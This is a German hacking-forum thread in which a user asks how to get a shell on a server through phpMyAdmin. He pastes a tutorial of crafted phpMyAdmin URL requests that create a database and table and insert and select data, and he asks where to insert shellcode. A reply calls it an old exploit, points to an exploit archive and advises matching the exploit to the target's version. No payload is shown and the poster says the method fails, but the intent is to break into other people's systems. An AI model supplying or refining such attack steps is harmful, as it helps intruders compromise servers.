Ergebnis 1 bis 2 von 2
  1. #1
    Neuling
    Registriert seit
    31.05.2009
    Beiträge
    2

    Standard PMA Hacken ohne SQL und READDUMP

    Hallo Free-Hack


    zu allererst: ich hoffe ich bin im richtigen Forum


    ich wollte euch heute mal fragen ob es eine Möglichkeit gibt, eine Shell via PMA ohne SQL.php und Readdump.php zu spawnen.

    Ich habe das Tutorial gefunden:

    Code:
    1. Eine Datenbank kann hiermit erstellt werden:
               
                db_create.php?db=###db-name###
               
    2. Eine Tabelle in der erstellten Datenbank kann man hiermit erstellen:
    
                tbl_create.php?db=###db-name###&table=###tabelle###&num_fields=1&do_save_data=true&field_name[0]=###feld###&field_type[0]=TEXT
               
    2b. Überprüfen ob erfolgreich:
               
                tbl_change.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=db&table=###tabelle###&goto=tbl_properties_structure.php&back=tbl_properties_structure.php
               
    3. Tabelle füllen (insert)
    
                tbl_replace.php?db=db&table=tabelle&goto=tbl_properties_structure.php&fields[multi_edit][0][data]=###inserted%20data###&insert_ignore_1=true
                tbl_replace.php?db=db&table=tabelle&goto=edit_next&fields[multi_edit][0][data]=###inserted%20data###&insert_ignore_1=true
    
    4. Select
                tbl_select.php?db=db&table=tabelle&goto=tbl_select.php&back=tbl_select.php&param[0]=data&session_max_rows=30&orderField=--nil--&order=ASC&where=1&submit=Go
    Bei mir funktioniert es nicht... Ich habe ###db-name### usw ersetzt.
    Wo muss der Shellcode rein? Vielleicht kann einer mir erklären wo ich was einsetzen muss damit es funktioniert..



    mfg

  2. #2
    Tsutomu Shimomura Avatar von -=Player=-
    Registriert seit
    15.02.2006
    Beiträge
    1.549

    Standard

    ich denke mal was du gefunden hast, ist ein altes exploit, was früher funktioniert hat.
    Bei den neuen versionen ist es sehr unwarscheinlich, dass dieser trick noch geht.

    Schau mal bei Milw0rm.com da gibt es 3 unterschiedliche exploits. Du musst nur schauen welche version dein ziel hat.

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •